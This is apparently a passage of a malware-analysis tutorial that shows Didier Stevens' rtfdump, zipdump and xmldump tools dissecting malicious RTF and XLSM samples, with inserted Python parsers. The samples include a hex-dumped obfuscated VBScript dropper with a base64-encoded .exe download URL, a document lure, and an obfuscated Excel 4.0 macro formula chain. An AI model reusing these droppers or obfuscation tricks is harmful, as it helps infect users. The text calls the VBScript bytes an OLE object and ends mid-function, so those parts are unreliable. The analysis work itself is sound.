000000B0: 67 65 20 3D 20 27 76 62  73 63 72 69 70 74 27 3E  ge = 'vbscript'>
000000C0: 0D 0A 0D 0A 66 73 64 66  64 73 66 73 20 3D 20 22  ....fsdfdsfs = "
000000D0: 61 48 52 30 55 44 6F 76  4C 33 64 6C 62 47 78 6A  aHR0UDovL3dlbGxj
000000E0: 59 57 78 73 63 79 35 6A  62 32 30 76 55 6D 56 6C  YWxscy5jb20vUmVl
000000F0: 62 47 5A 79 59 57 31 6C  4C 6D 56 34 5A 51 3D 3D  bGZyYW1lLmV4ZQ==
00000100: 22 20 27 6E 63 6D 78 62  36 35 37 34 0D 0A 79 75  " 'ncmxb6574..yu
00000110: 6C 6B 79 74 6A 74 72 68  74 6A 72 6B 64 73 61 72  lkytjtrhtjrkdsar
00000120: 6A 6B 79 20 3D 22 55 6D  56 6C 62 47 5A 79 59 57  jky ="UmVlbGZyYW
00000130: 31 6C 4C 6D 56 34 5A 51  3D 3D 22 20 27 6E 63 6D  1lLmV4ZQ==" 'ncm
00000140: 78 62 36 35 37 34 0D 0A  0D 0A 6D 6A 66 76 79 67  xb6574....mjfvyg
00000150: 67 68 65 62 6A 74 65 66  20 3D 20 22 62 22 0D 0A  ghebjtef = "b"..
00000160: 77 73 6C 61 75 73 66 79  63 68 6B 73 20 3D 20 6D  wslausfychks = m
00000170: 6A 66 76 79 67 67 68 65  62 6A 74 65 66 20 2B 20  jfvygghebjtef +
00000180: 22 69 6E 22 0D 0A 77 73  6C 61 75 73 66 79 63 68  "in"..wslausfych
00000190: 6B 73 20 3D 20 77 73 6C  61 75 73 66 79 63 68 6B  ks = wslausfychk
000001A0: 73 20 2B 20 22 2E 22 0D  0A 77 73 6C 61 75 73 66  s + "."..wslausf
000001B0: 79 63 68 6B 73 20 3D 20  77 73 6C 61 75 73 66 79  ychks = wslausfy
000001C0: 63 68 6B 73 20 2B 20 6D  6A 66 76 79 67 67 68 65  chks + mjfvygghe
000001D0: 62 6A 74 65 66 0D 0A 77  73 6C 61 75 73 66 79 63  bjtef..wslausfyc
000001E0: 68 6B 73 20 3D 20 77 73  6C 61 75 73 66 79 63 68  hks = wslausfych
000001F0: 6B 73 20 2B 20 22 61 22  0D 0A 77 73 6C 61 75 73  ks + "a"..wslaus
00000200: 66 79 63 68 6B 73 20 3D  20 77 73 6C 61 75 73 66  fychks = wslausf
00000210: 79 63 68 6B 73 20 2B 20  22 73 22 0D 0A 77 73 6C  ychks + "s"..wsl
00000220: 61 75 73 66 79 63 68 6B  73 20 3D 20 77 73 6C 61  ausfychks = wsla
00000230: 75 73 66 79 63 68 6B 73  20 2B 20 22 65 22 0D 0A  usfychks + "e"..
00000240: 77 73 6C 61 75 73 66 79  63 68 6B 73 20 3D 20 77  wslausfychks = w
00000250: 73 6C 61 75 73 66 79 63  68 6B 73 20 2B 20 22 36  slausfychks + "6
00000260: 22 0D 0A 77 73 6C 61 75  73 66 79 63 68 6B 73 20  "..wslausfychks
00000270: 3D 20 77 73 6C 61 75 73  66 79 63 68 6B 73 20 2B  = wslausfychks +
00000280: 20 22 22 20 2B 20 22 34  22 0D 0A 0D 0A 46 75 6E   "" + "4"....Fun
00000290: 63 74 69 6F 6E 20 61 67  65 36 34 50 72 6F 63 6F  ction age64Proco
000002A0: 64 65 28 42 79 56 61 6C  20 63 76 77 74 72 35 79  de(ByVal cvwtr5y
000002B0: 63 62 76 65 2C 20 42 79  56 61 6C 20 74 72 74 73  cbve, ByVal trts
000002C0: 6B 34 38 34 74 33 37 38  29 0D 0A 20 20 20 20 44  k484t378)..    D
000002D0: 69 6D 20 78 74 65 78 65  6E 63 0D 0A 20 20 20 20  im xtexenc..

(remainder omitted)
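The decoded bytes above are an OLE 1.0 object whose class name is "package": an OLE1 header (version 01 05 00 00, format id 2 for embedded, the class name, empty topic and item names, the data size), followed by the Package record that carries the embedded file name, its source path, the temp path and the file contents. That is exactly what rtfobj summarized earlier as Filename / Source path / Temp path / MD5. The following is an added Python example, not part of the original post, rtfobj or rtfdump.py, that decodes the \objdata hex of an RTF and parses that structure; the RTF and the embedded file are constructed in memory, and the risky-extension list is this example's own, with .sct included because that is the extension rtfobj flagged above.

```python
import hashlib
import re
import struct

# Extensions Windows executes directly or hands to a script host; a Package object
# carrying one of these is what rtfobj labelled "EXECUTABLE FILE" above.
RISKY_EXTENSIONS = {"exe", "dll", "scr", "com", "sct", "js", "jse", "vbs", "vbe",
                    "wsf", "hta", "cmd", "bat", "ps1"}
OBJDATA = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")


def build_ole1_package(filename, source_path, temp_path, payload):
    """Constructed OLE 1.0 'Package' object laid out like the rtfdump -H bytes above."""
    def cstr(s):
        return s.encode("latin-1") + b"\x00"
    cls = b"package\x00"
    package = (b"\x02\x00" + cstr(filename) + cstr(source_path)
               + b"\x00\x00\x03\x00" + struct.pack("<I", len(temp_path) + 1) + cstr(temp_path)
               + struct.pack("<I", len(payload)) + payload)
    header = (struct.pack("<III", 0x00000501, 2, len(cls)) + cls  # version, format id (2 = embedded), class
              + struct.pack("<II", 0, 0)                           # topic name and item name (empty)
              + struct.pack("<I", len(package)))                   # data size
    return header + package


def build_sample_rtf():
    """Constructed RTF wrapping the object in \\objdata as hex, 64 digits per line."""
    obj = build_ole1_package("sample.sct", r"C:\src\sample.sct", r"C:\tmp\sample.sct",
                             b"constructed test bytes")
    hexs = obj.hex()
    body = b"\r\n".join(hexs[i:i + 64].encode() for i in range(0, len(hexs), 64))
    return b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objdata\r\n" + body + b"}}\\par }"


def extract_objdata(rtf):
    """Decode every \\objdata hex run (whitespace tolerant) into raw OLE1 bytes.
    Simplification: nested groups and \\bin runs inside objdata are not handled."""
    blobs = []
    for m in OBJDATA.finditer(rtf):
        digits = re.sub(rb"\s+", b"", m.group(1))
        if len(digits) % 2 == 0:
            blobs.append(bytes.fromhex(digits.decode("ascii")))
    return blobs


def parse_package(data):
    """Package record: 0x0002, filename, source path, flags, temp path, size, contents."""
    off = 2
    def cstring():
        nonlocal off
        end = data.index(b"\x00", off)
        s, off = data[off:end].decode("latin-1"), end + 1
        return s
    filename, source_path = cstring(), cstring()
    off += 4  # flags/type
    temp_len = struct.unpack_from("<I", data, off)[0]; off += 4
    temp_path = data[off:off + temp_len].rstrip(b"\x00").decode("latin-1"); off += temp_len
    size = struct.unpack_from("<I", data, off)[0]; off += 4
    content = data[off:off + size]
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return {"filename": filename, "source_path": source_path, "temp_path": temp_path,
            "embedded_size": size, "md5": hashlib.md5(content).hexdigest(),
            "risky_extension": ext in RISKY_EXTENSIONS, "content": content}


def parse_ole1(blob):
    """OLE 1.0 object header, the fields rtfobj prints as format_id, class name, data size."""
    version, format_id, cls_len = struct.unpack_from("<III", blob, 0)
    off = 12
    cls = blob[off:off + cls_len].rstrip(b"\x00").decode("latin-1"); off += cls_len
    topic_len, item_len = struct.unpack_from("<II", blob, off); off += 8 + topic_len + item_len
    data_len = struct.unpack_from("<I", blob, off)[0]; off += 4
    info = {"version": version, "format_id": format_id, "class": cls, "data_size": data_len}
    if cls.lower() == "package":
        info.update(parse_package(blob[off:off + data_len]))
    return info


if __name__ == "__main__":
    for blob in extract_objdata(build_sample_rtf()):
        print({k: v for k, v in parse_ole1(blob).items() if k != "content"})
```

The md5 field is computed over the embedded file contents, which is the value rtfobj prints in its MD5 column; the risky_extension flag is the check to wire into an alert, since a Package object whose file name ends in a script or executable extension has no legitimate place in an invoice.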

Adding "-d" extracts only the strings.

cmd.exe
C:\Users\masaomi\Documents\DidierStevensSuite>rtfdump.py -s 3 -d sample.doc
\fcs1 \af31507 \ltrch\fcs0 \insrsid4932593
Microsoft Office does not work in email Preview.\line Please download the document and click {\b Enable Editing} when opening.

zipdump.py

A tool for analyzing ZIP files, but it can also be used to analyze Office files.
The options are similar to those of oledump.py.

cmd.exe
C:\Users\masaomi\Downloads\DidierStevensSuite>zipdump.py sample.xlsm
Index Filename                            Encrypted Timestamp
    1 [Content_Types].xml                         0 1980-01-01 00:00:00
    2 _rels/.rels                                 0 1980-01-01 00:00:00
    3 xl/workbook.xml                             0 1980-01-01 00:00:00
    4 xl/_rels/workbook.xml.rels                  0 1980-01-01 00:00:00
    5 xl/worksheets/sheet1.xml                    0 1980-01-01 00:00:00
    6 xl/worksheets/sheet2.xml                    0 1980-01-01 00:00:00
    7 xl/worksheets/sheet3.xml                    0 1980-01-01 00:00:00
    8 xl/worksheets/sheet4.xml                    0 1980-01-01 00:00:00
    9 xl/macrosheets/intlsheet1.xml               0 1980-01-01 00:00:00
   10 xl/theme/theme1.xml                         0 1980-01-01 00:00:00
   11 xl/styles.xml                               0 1980-01-01 00:00:00
   12 xl/sharedStrings.xml                        0 1980-01-01 00:00:00
   13 xl/drawings/drawing1.xml                    0 1980-01-01 00:00:00
   14 xl/media/image1.png                         0 1980-01-01 00:00:00
   15 xl/worksheets/_rels/sheet1.xml.rels         0 1980-01-01 00:00:00
   16 xl/drawings/_rels/drawing1.xml.rels         0 1980-01-01 00:00:00
   17 xl/calcChain.xml                            0 1980-01-01 00:00:00
   18 docProps/core.xml                           0 1980-01-01 00:00:00
   19 docProps/app.xml                            0 1980-01-01 00:00:00

Adding "-d" shows the contents.

cmd.exe
C:\Users\masaomi\Downloads\DidierStevensSuite>zipdump.py -s 9 -d sample.xlsm
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
 xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://
schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://s
chemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2
xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/a
c" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xm
lns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns
:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr
6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{A
0124FFD-D8B1-4C57-9FC3-DE9478087DFA}"><dimension ref="G8"/><sheetViews><sheetVie
w showFormulas="1" workbookViewId="0"><selection activeCell="B4" sqref="B4"/></s
heetView></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25
"/><cols><col min="7" max="7" width="255.7109375" bestFit="1" customWidth="1"/><
/cols><sheetData><row r="8" spans="7:7" x14ac:dyDescent="0.25"><c r="G8" t="b"><
f>FORMULA(Cdfea!P22&amp;Cdfea!H9&amp;Cdfea!L2&amp;Cdfea!B15&amp;Cdfea!B15&amp;Tg
bs!D7&amp;Tgbs!F3&amp;Cdfea!F10&amp;Tgbs!I10&amp;Cdfea!H4&amp;Cdfea!L2&amp;Tgbs!
Q9&amp;Tgbfgs!J17&amp;Tgbs!F14&amp;Tgbfgs!S15&amp;Tgbfgs!F16,G13)=FORMULA(Cdfea!
P22&amp;Cdfea!J11&amp;Cdfea!B18&amp;Cdfea!P11&amp;"NEVR1"&amp;Tgbfgs!Q5&amp;Cdfe
a!H9&amp;Cdfea!L2&amp;Cdfea!B15&amp;Cdfea!B15&amp;Tgbs!D7&amp;Tgbs!F3&amp;Cdfea!
F10&amp;Tgbs!I10&amp;Cdfea!H4&amp;Cdfea!L2&amp;Tgbs!Q9&amp;Tgbfgs!J17&amp;Tgbs!G
16&amp;Tgbfgs!S15&amp;Tgbfgs!F16&amp;Cdfea!P13,G15)=FORMULA(Cdfea!P22&amp;Cdfea!
J11&amp;Cdfea!B18&amp;Cdfea!P11&amp;"NEVR2"&amp;Tgbfgs!Q5&amp;Cdfea!H9&amp;Cdfea
!L2&amp;Cdfea!B15&amp;Cdfea!B15&amp;Tgbs!D7&amp;Tgbs!F3&amp;Cdfea!F10&amp;Tgbs!I
10&amp;Cdfea!H4&amp;Cdfea!L2&amp;Tgbs!Q9&amp;Tgbfgs!J17&amp;Tgbs!H14&amp;Tgbfgs!
S15&amp;Tgbfgs!F16&amp;Cdfea!P13,G17)=FORMULA(Cdfea!P22&amp;Cdfea!J11&amp;Cdfea!
B18&amp;Cdfea!P11&amp;"NEVR3"&amp;Tgbfgs!Q5&amp;Cdfea!H9&amp;Cdfea!L2&amp;Cdfea!
B15&amp;Cdfea!B15&amp;Tgbs!D7&amp;Tgbs!F3&amp;Cdfea!F10&amp;Tgbs!I10&amp;Cdfea!H
4&amp;Cdfea!L2&amp;Tgbs!Q9&amp;Tgbfgs!J17&amp;Tgbs!I16&amp;Tgbfgs!S15&amp;Tgbfgs
!F16&amp;Cdfea!P13,G19)=FORMULA(Cdfea!P22&amp;Cdfea!J11&amp;Cdfea!B18&amp;Cdfea!
P11&amp;"NEVR4"&amp;Tgbfgs!Q5&amp;Cdfea!H9&amp;Cdfea!L2&amp;Cdfea!B15&amp;Cdfea!
B15&amp;Tgbs!D7&amp;Tgbs!F3&amp;Cdfea!F10&amp;Tgbs!I10&amp;Cdfea!H4&amp;Cdfea!L2
&amp;Tgbs!Q9&amp;Tgbfgs!J17&amp;Tgbs!J14&amp;Tgbfgs!S15&amp;Tgbfgs!F16&amp;Cdfea
!P13,G21)=FORMULA(Cdfea!P22&amp;Cdfea!J11&amp;Cdfea!B18&amp;Cdfea!P11&amp;"NEVR5
"&amp;Tgbfgs!Q5&amp;Cdfea!H9&amp;Cdfea!L2&amp;Cdfea!B15&amp;Cdfea!B15&amp;Tgbs!D
7&amp;Tgbs!F3&amp;Cdfea!F10&amp;Tgbs!I10&amp;Cdfea!H4&amp;Cdfea!L2&amp;Tgbs!Q9&a
mp;Tgbfgs!J17&amp;Tgbs!K16&amp;Tgbfgs!S15&amp;Tgbfgs!F16&amp;Cdfea!P13,G23)=FORM
ULA(Cdfea!P22&amp;Cdfea!J11&amp;Cdfea!B18&amp;Cdfea!P11&amp;"NEVR6"&amp;Tgbfgs!Q
5&amp;Cdfea!H9&amp;Cdfea!L2&amp;Cdfea!B15&amp;Cdfea!B15&amp;Tgbs!D7&amp;Tgbs!F3&
amp;Cdfea!F10&amp;Tgbs!I10&amp;Cdfea!H4&amp;Cdfea!L2&amp;Tgbs!Q9&amp;Tgbfgs!J17&
amp;Tgbs!L14&amp;Tgbfgs!S15&amp;Tgbfgs!F16&amp;Cdfea!P13,G25)=FORMULA(Cdfea!P22&
amp;Cdfea!J11&amp;Cdfea!B18&amp;Cdfea!P11&amp;"NEVR7"&amp;Tgbfgs!Q5&amp;Cdfea!H9
&amp;Cdfea!B15&amp;Cdfea!I17&amp;Cdfea!I3&amp;Cdfea!H13&amp;Cdfea!P11&amp;Cdfea!
K9&amp;Cdfea!P13&amp;Cdfea!P7&amp;Cdfea!P13,G27)=FORMULA(Cdfea!P22&amp;Cdfea!H13
&amp;Cdfea!N4&amp;Cdfea!H13&amp;Cdfea!H9&amp;Cdfea!P11&amp;Cdfea!P15&amp;Cdfea!H
9&amp;Cdfea!P20&amp;Tgbfgs!M12&amp;Tgbfgs!N8&amp;Tgbfgs!I4&amp;Tgbs!R21&amp;Tgbf
gs!G10&amp;Cdfea!P15&amp;Cdfea!P13,G29)=FORMULA(Cdfea!P22&amp;Cdfea!G24&amp;Cdfe
a!H13&amp;Cdfea!E6&amp;Cdfea!E11&amp;Cdfea!G24&amp;Cdfea!K23&amp;Cdfea!P11&amp;C
dfea!P13,G34)</f><v>1</v></c></row></sheetData><pageMargins left="0.7" right="0.
7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>

Adding "-t utf8 or utf16" lets you decode the output.

xmldump.py

It parses the XML files contained in an Office file.
With "text", it extracts every string from the elements in the XML.

cmd.exe
C:\Users\masaomi\Downloads\DidierStevensSuite>zipdump.py -s 9 -d sample.xlsm | x
mldump.py text
FORMULA(Cdfea!P22&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F1
0&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!F14&Tgbfgs!S15&Tgbfgs!F16,G
13)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR1"&Tgbfgs!Q5&Cdfea!H9&C
dfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2
&Tgbs!Q9&Tgbfgs!J17&Tgbs!G16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G15)=FORMULA(Cdfea!
P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR2"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&
Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J1
7&Tgbs!H14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G17)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfe
a!B18&Cdfea!P11&"NEVR3"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&
Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!I16&Tgbfgs!
S15&Tgbfgs!F16&Cdfea!P13,G19)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"N
EVR4"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&
Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!J14&Tgbfgs!S15&Tgbfgs!F16&Cdf
ea!P13,G21)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR5"&Tgbfgs!Q5&Cd
fea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&
Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!K16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G23)=FORMUL
A(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR6"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cd
fea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&T
gbfgs!J17&Tgbs!L14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G25)=FORMULA(Cdfea!P22&Cdfea!
J11&Cdfea!B18&Cdfea!P11&"NEVR7"&Tgbfgs!Q5&Cdfea!H9&Cdfea!B15&Cdfea!I17&Cdfea!I3&
Cdfea!H13&Cdfea!P11&Cdfea!K9&Cdfea!P13&Cdfea!P7&Cdfea!P13,G27)=FORMULA(Cdfea!P22
&Cdfea!H13&Cdfea!N4&Cdfea!H13&Cdfea!H9&Cdfea!P11&Cdfea!P15&Cdfea!H9&Cdfea!P20&Tg
bfgs!M12&Tgbfgs!N8&Tgbfgs!I4&Tgbs!R21&Tgbfgs!G10&Cdfea!P15&Cdfea!P13,G29)=FORMUL
A(Cdfea!P22&Cdfea!G24&Cdfea!H13&Cdfea!E6&Cdfea!E11&Cdfea!G24&Cdfea!K23&Cdfea!P11
&Cdfea!P13,G34)1

With "wordtext", it prints the strings of the w:p elements.
With "elementtext", it prints every element in the XML file together with its text.

cmd.exe
C:\Users\masaomi\Downloads\DidierStevensSuite>zipdump.py -s 9 -d sample.xlsm | x
mldump.py elementtext
xm:macrosheet: FORMULA(Cdfea!P22&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&T
gbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!F14&Tgbfgs!S
15&Tgbfgs!F16,G13)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR1"&Tgbfg
s!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cd
fea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!G16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G15)
=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR2"&Tgbfgs!Q5&Cdfea!H9&Cdfe
a!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tg
bs!Q9&Tgbfgs!J17&Tgbs!H14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G17)=FORMULA(Cdfea!P22
&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR3"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdf
ea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&T
gbs!I16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G19)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B
18&Cdfea!P11&"NEVR4"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgb
s!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!J14&Tgbfgs!S15
&Tgbfgs!F16&Cdfea!P13,G21)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR
5"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgb
s!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!K16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!
P13,G23)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR6"&Tgbfgs!Q5&Cdfea
!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdf
ea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!L14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G25)=FORMULA(C
dfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR7"&Tgbfgs!Q5&Cdfea!H9&Cdfea!B15&Cdfe
a!I17&Cdfea!I3&Cdfea!H13&Cdfea!P11&Cdfea!K9&Cdfea!P13&Cdfea!P7&Cdfea!P13,G27)=FO
RMULA(Cdfea!P22&Cdfea!H13&Cdfea!N4&Cdfea!H13&Cdfea!H9&Cdfea!P11&Cdfea!P15&Cdfea!
H9&Cdfea!P20&Tgbfgs!M12&Tgbfgs!N8&Tgbfgs!I4&Tgbs!R21&Tgbfgs!G10&Cdfea!P15&Cdfea!
P13,G29)=FORMULA(Cdfea!P22&Cdfea!G24&Cdfea!H13&Cdfea!E6&Cdfea!E11&Cdfea!G24&Cdfe
a!K23&Cdfea!P11&Cdfea!P13,G34)1
dimension:
sheetViews:
sheetView:
selection:
sheetFormatPr:
cols:
col:

(rest omitted)

Adding "-u" includes the namespace URL strings in the output.

cmd.exe
C:\Users\masaomi\Downloads\DidierStevensSuite>zipdump.py -s 9 -d sample.xlsm | x
mldump.py -u elementtext
{http://schemas.microsoft.com/office/excel/2006/main}macrosheet: FORMULA(Cdfea!P
22&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfe
a!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!F14&Tgbfgs!S15&Tgbfgs!F16,G13)=FORMULA(Cdf
ea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR1"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B
15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs
!J17&Tgbs!G16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G15)=FORMULA(Cdfea!P22&Cdfea!J11&C
dfea!B18&Cdfea!P11&"NEVR2"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!
D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!H14&Tgbf
gs!S15&Tgbfgs!F16&Cdfea!P13,G17)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11
&"NEVR3"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F
10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!I16&Tgbfgs!S15&Tgbfgs!F16&
Cdfea!P13,G19)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR4"&Tgbfgs!Q5
&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!
H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!J14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G21)=FOR
MULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR5"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2
&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q
9&Tgbfgs!J17&Tgbs!K16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G23)=FORMULA(Cdfea!P22&Cdf
ea!J11&Cdfea!B18&Cdfea!P11&"NEVR6"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B
15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!
L14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G25)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&C
dfea!P11&"NEVR7"&Tgbfgs!Q5&Cdfea!H9&Cdfea!B15&Cdfea!I17&Cdfea!I3&Cdfea!H13&Cdfea
!P11&Cdfea!K9&Cdfea!P13&Cdfea!P7&Cdfea!P13,G27)=FORMULA(Cdfea!P22&Cdfea!H13&Cdfe
a!N4&Cdfea!H13&Cdfea!H9&Cdfea!P11&Cdfea!P15&Cdfea!H9&Cdfea!P20&Tgbfgs!M12&Tgbfgs
!N8&Tgbfgs!I4&Tgbs!R21&Tgbfgs!G10&Cdfea!P15&Cdfea!P13,G29)=FORMULA(Cdfea!P22&Cdf
ea!G24&Cdfea!H13&Cdfea!E6&Cdfea!E11&Cdfea!G24&Cdfea!K23&Cdfea!P11&Cdfea!P13,G34)
1

(rest omitted)
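What the `zipdump.py | xmldump.py -u elementtext` pipeline above walks through can be reproduced with the Python standard library: iterate the OOXML parts, list each element's namespace-qualified tag and text, and flag any part whose root is xm:macrosheet (an Excel 4.0 macro sheet). This is an added example, not code from Didier Stevens' suite; the workbook it scans is constructed in memory and modelled on the macrosheet part shown above.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Constructed sample container (not a real malware sample): one ordinary worksheet
# plus one Excel 4.0 macro sheet modelled on the xm:macrosheet part shown above.
MAIN_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
XM_NS = "http://schemas.microsoft.com/office/excel/2006/main"
MACROSHEET_XML = (
    f'<xm:macrosheet xmlns="{MAIN_NS}" xmlns:xm="{XM_NS}">'
    '<sheetData><row r="8"><c r="G8" t="b">'
    '<f>FORMULA(Cdfea!P22&amp;Cdfea!H9,G13)=HALT()</f><v>1</v>'
    '</c></row></sheetData></xm:macrosheet>'
)
WORKSHEET_XML = (
    f'<worksheet xmlns="{MAIN_NS}"><sheetData><row r="1">'
    '<c r="A1" t="inlineStr"><is><t>Invoice</t></is></c>'
    '</row></sheetData></worksheet>'
)


def build_sample_xlsm() -> bytes:
    """Pack the constructed parts into an in-memory OOXML zip."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/worksheets/sheet1.xml", WORKSHEET_XML)
        zf.writestr("xl/macrosheets/sheet1.xml", MACROSHEET_XML)
    return buf.getvalue()


def element_text(xml_bytes: bytes):
    """Like `xmldump.py -u elementtext`: ({namespace}tag, text) for every element."""
    root = ET.fromstring(xml_bytes)
    return [(el.tag, (el.text or "").strip()) for el in root.iter()]


def find_macrosheets(xlsm_bytes: bytes):
    """Map each part whose root is xm:macrosheet to the formulas in its <f> elements;
    any such part means the workbook carries Excel 4.0 (XLM) macros."""
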